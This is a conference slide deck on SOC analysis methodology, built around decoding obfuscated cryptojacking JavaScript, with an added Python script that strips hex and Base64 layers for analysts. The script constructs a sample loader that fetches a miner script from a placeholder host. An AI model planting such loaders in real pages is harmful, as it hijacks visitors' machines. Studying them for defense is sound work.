Following The Breadcrumbs · 2018-09-06 · Event Selected: Nothing odd here? x56 x32 x68 x68 x64...
Following The Breadcrumbs
Presented by: SSgt Samuel Kimmons
x56 x32
Before We Begin
• All thoughts and opinions expressed by me during this presentation are my own and do not represent those of my employer.
x56 x32 x68 x68
$>whoami: Samuel Kimmons
Attribs:
• Cyber Threat Emulator (Pentesting) & Air Force Cyberspace Defense Analyst (ACD-O)
• 33rd Network Warfare Squadron
• Also known as: The Air Force Computer Emergency Response Team (AFCERT)
• GIAC Web Application Penetration Tester (GWAPT)
• GIAC Certified Incident Handler (GCIH)
• Pursuing an M.S. in Cyber Security at New York University (NYU)
• In My Spare Time:
• Capture The Flag (CTF) Player
• Python Scripter
• Certification Collector
How To Contact Me?
Official email: [email protected]
Personal email: [email protected]
@5pecial__K via Twitter
x56 x32 x68 x68 x64 x43
So What Does That Mean?
x56 x32 x68 x68 x64 x43 x42 x35
• I’m passionate about Cyber Security.
• I love solving complex problems.
• I attempt to look at situations a bit differently.
• This stuff is just all around fun.
Let’s Jump Right In
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33
Imagine you’re an analyst starting your day:
• You grab your coffee.
• Get logged into the SIEM.
• Throw on some headphones and get to work.
All of a sudden, alerts start firing!
What could it be?
• An APT?
• Malicious file execution?
• Or maybe nothing at all?
Just Pick One!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67
What’s your organization’s policy?
• First in the queue?
• Severity level?
• Or is it random?
For this scenario, let’s go with: Trojanware.
Trojanware:
• Simply a program that’s doing something it isn’t supposed to be doing.
Event Selected: Nothing odd here?
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32
Seems like a no-brainer investigation.
Just follow your procedural steps:
• Check the pcap
• Check the IPs/URLs
• Run any hashes through VirusTotal, ThreatMiner, AlienVault, etc.
Maybe it’s an internal-to-internal IP; that means non-malicious, right?
Why is the alert firing?
Mark It As Benign
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c
The alert fired on Trojanware, probably because something performed an out-of-the-ordinary action.
• All of the sensors / security devices gave you a thumbs up.
• But what about that block of code in the pcap? Maybe the analyst thought it was just a part of the session data?
At this point a lot of junior and some experienced analysts would close it out and move on.
Was The Analyst Wrong?
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47
Maybe nothing seemed truly odd or out of place. What they followed:
• Rinse and Repeat
• Cut and Dry
• Copy and Paste
Styles of analysis that they most likely follow for every investigation.
Is the Analyst to blame, or are the box-checking styles of analysis the root cause? Maybe it’s the organization that’s locking them into these analytical methodologies?
These limiting analytical methodologies can be a plague upon Cyber Security Operations in an organization.
So why do we lock our analysts into these procedural thinking methods? Shouldn’t we empower them to think differently?
Run It Again!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a
Let’s start over, but without the limiting factors of a checkbox methodology.
Empower the Analyst to think more freely, and approach each data point in a dynamic way.
Equip your Sherlock Holmes hat and get to it!
Let’s Try This Again
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47
Imagine that the first run through was pretty accurate.
The Analyst verified that none of the available data was malicious. Well, not exactly...
Looks like a typical blob of data in a pcap…
Does it though?
Do you remember that snippet of code?
Moving Beyond
Taking a step outside of the old methodology:
• We can conclude that there is some level of encoding at play here.
• Maybe hex or Base64 encoding.
• Run it through some tools:
• Base64 decoder
• CyberChef
• Etc.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c
Now We’re Cooking
The structure of the code starts to become apparent. Remember, this alert was most likely triggered by web traffic. Could it be some malicious script?
I think we’re on to something here! Hex encoding? The plot thickens!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d
Hex Be Gone
Using a tool to convert the hex into plain text, we can see what’s actually going on.
Tada!
What is the script doing?
• We know it’s JavaScript.
• We can see URLs.
What if we as the Analyst haven’t the faintest idea of what JavaScript can do?
Time to break out the ole Google-fu!
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73
A Few Moments Later…
Boom!
Based on the code, it appears that the JavaScript file is attempting to redirect the user.
It may not have been obvious in the beginning but a certain level of obfuscation was being used in this script.
Obfuscation?
What is obfuscation and how should we as Analysts approach it?
Obfuscation according to techtarget.com:
“Obfuscation is the practice of making something difficult to understand. Programming code is often obfuscated to protect intellectual property and prevent an attacker from reverse engineering a proprietary software.”
Like with every piece of technology developed for a good purpose, someone has probably weaponized it.
For example:
• DNS used for Command and Control.
• Interprotocol exploitation.
• Etc. There are tons of examples.
Given enough time an Analyst can reverse engineer a piece of obfuscated code by following the breadcrumbs, which is not always simple.
Depending on the level of complexity this may take some time, but it is possible! Keep in mind that hex and Base64 are reversible encodings rather than encryption: the work is in recognising the layers, not in breaking them.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68
The Initial Run Through
Investigation Part 1:
• Straightforward.
• Analyst had restrictive guidelines.
• A simple methodology was used.
This type of approach assumes the malicious actions will jump right out at them.
A simple analytical methodology may work sometimes.
That sure is putting a lot of faith in the tuning of your security devices.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70
Final Run Through
Investigation Part 2:
• Started the same way as the first run through.
• The answer wasn’t blatantly obvious.
• Had to apply a different methodology.
• Followed the breadcrumbs, which led to our final result.
[Diagram] Stepping-off point → Data point → Spawned more questions → Data analyzed → Analysis-driven results
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31
Can You Follow The Breadcrumbs?
It’s rare!
An advanced attacker will most likely not leave simple breadcrumbs behind. More specifically, an APT!
The threats facing your organization:
• Aren’t adhering to limiting guidelines.
• Will try whatever possible to complete their objectives.
The adversary isn’t locking themselves into a procedural box.
So why should we?
Allowing our Analysts to think outside the box can greatly increase the odds of identifying nefarious actions.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76
Putting The Puzzle Together
As Analysts or Investigators we’re often tasked with putting pieces of various types and amounts of data together to create an understandable picture of the events that led to an alert.
This can often be time consuming and require you to think a certain way.
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69
A Recipe For Disaster
An example that just so happens to involve breadcrumbs:
• An alert fires for Trojanware
• A fellow Analyst asks for help.
• Began to analyze:
• IPs / URLs = Checks out, nothing odd
• Past events = Checks out, nothing odd
• In the pcap: some type of obfuscated code
• Analyzed the code
• Base64 encoded
• Decoded the JavaScript
• Appears to also have URLs encoded in hex
• After restoring the original data = Found to be CryptoJacking Malware!
Who would have ever thought that as an Analyst you would be analyzing malware on a baking site hosting a breadcrumb recipe?
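The two decoding walks on this page (the hex-then-Base64 blob from the "Moving Beyond" and "Hex Be Gone" slides, and the Base64-wrapped JavaScript with hex-encoded URLs from the recipe-site case above) are the same procedure: keep peeling one encoding at a time until what is left is readable, then pull out the indicators. The script below is an added example written for this page, not the speaker's tooling or the CyberChef recipe he used. It takes the breadcrumb hex printed on the final slide as one input, and as the other a constructed stand-in for the pcap blob (a loader script whose URL is hidden as `\xNN` escapes and then Base64-wrapped; the `pool.example` domain and the `miner.min.js` name are made up). Decoding here is pure text transformation; nothing is ever executed.

```python
"""Peel layered encodings off a blob pulled from a pcap.

Added example for this page (not the speaker's tooling). It walks the same
path the slides describe: text that is hex -> Base64 -> script, and a script
whose URLs are hidden as \\xNN escapes. BREADCRUMB is the hex from the final
slide; the JavaScript sample is constructed below, with a made-up domain.
"""
import base64
import binascii
import re
import string

# The breadcrumb printed on the last slide of the deck, copied verbatim.
BREADCRUMB = (
    "x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c "
    "x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 "
    "x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69 x34 x3d"
)

HEX_TOKEN = re.compile(r"^(?:\\x|0x|x)?([0-9a-fA-F]{2})$")  # x56, 0x56, \x56 or 56
JS_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")           # \x68 inside a JS string
BASE64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")
PRINTABLE = set(string.printable)


def as_text(raw: bytes):
    """Return raw as str if it is printable ASCII, else None (binary stays undecoded)."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(ch in PRINTABLE for ch in text) else None


def from_hex_tokens(s: str):
    """'x56 x32 ...', '0x56 0x32' or '56 32' -> text. Needs at least two tokens."""
    tokens = s.split()
    if len(tokens) < 2:
        return None
    out = bytearray()
    for tok in tokens:
        m = HEX_TOKEN.match(tok)
        if not m:
            return None
        out.append(int(m.group(1), 16))
    return as_text(bytes(out))


def from_hex_string(s: str):
    """Unbroken hex such as '56326868...' -> text."""
    compact = "".join(s.split())
    if len(compact) < 4 or len(compact) % 2 or not all(c in string.hexdigits for c in compact):
        return None
    return as_text(bytes.fromhex(compact))


def from_base64(s: str):
    """Strict Base64 (alphabet only, length a multiple of 4) -> text."""
    compact = "".join(s.split())
    if len(compact) < 8 or len(compact) % 4 or not BASE64_CHARS.match(compact):
        return None
    try:
        return as_text(base64.b64decode(compact, validate=True))
    except binascii.Error:
        return None


def from_js_hex_escapes(s: str):
    """Replace \\xNN escapes (how the slide's URLs were hidden) with the characters they encode."""
    if not JS_HEX_ESCAPE.search(s):
        return None
    text = JS_HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return text if all(ch in PRINTABLE for ch in text) else None


# Order matters: a run of hex digits is also valid Base64, so hex is tried first.
DECODERS = [
    ("hex-tokens", from_hex_tokens),
    ("hex-string", from_hex_string),
    ("base64", from_base64),
    ("js-hex-escapes", from_js_hex_escapes),
]


def peel(blob: str, max_layers: int = 8):
    """Apply decoders repeatedly; return [(layer_name, decoded_text), ...]."""
    layers = []
    current = blob.strip()
    for _ in range(max_layers):
        for name, decode in DECODERS:
            out = decode(current)
            if out is not None:
                layers.append((name, out))
                current = out
                break
        else:
            break  # nothing recognised this round: we have reached the plaintext
    return layers


def extract_urls(text: str):
    """Indicators to hand to VirusTotal & co. instead of browsing to them."""
    return URL_RE.findall(text)


def build_js_sample():
    """Constructed stand-in for the 'Recipe For Disaster' blob: a loader whose
    script URL is hidden as \\xNN escapes, then the whole thing Base64-wrapped.
    The domain is made up."""
    url = "https://pool.example/lib/miner.min.js"
    hidden = "".join("\\x%02x" % ord(c) for c in url)
    script = ('var s=document.createElement("script");s.src="%s";'
              'document.head.appendChild(s);' % hidden)
    return base64.b64encode(script.encode()).decode()


if __name__ == "__main__":
    for label, blob in (("breadcrumb", BREADCRUMB), ("pcap blob", build_js_sample())):
        layers = peel(blob)
        print(f"== {label}")
        for name, text in layers:
            print(f"  [{name}] {text[:70]}")
        print("  urls:", extract_urls(layers[-1][1]) if layers else [])
```

Each decoder refuses to "succeed" unless its output is printable text, which is what stops the loop from eating a legitimate word as hex or Base64; a binary stage (a packed payload, say) simply ends the walk and has to be handled by other means. The URLs that fall out are indicators to look up, in the reputation services the procedural checklist already names, not to visit.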
x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69 x34 x3d
Endgame
What have we learned?
• That we should approach every investigation in a dynamic manner.
• Our methods should be adaptable to the information we have available to us.
• There’s no way our security devices can detect everything!
• That’s where we as the Analysts come in.
• It is truly up to us to really drill down and determine if an event is malicious or simply noise in the SIEM.
Are you employing the correct analytical methodology?
The best methodology is the one that is fluid and can be implemented into every step of an investigation.
The Breadcrumb Challenge
So did you follow the Breadcrumbs?
You may have noticed the hex on each slide.
Challenge:
The first individual to contact me with the answer will get a copy of The Blue Team Field Manual.
Personal email: [email protected]
@5pecial__K via Twitter
Two Underscores
Questions?
Contact info:
Official email: [email protected]
Personal email: [email protected]
@5pecial__K via Twitter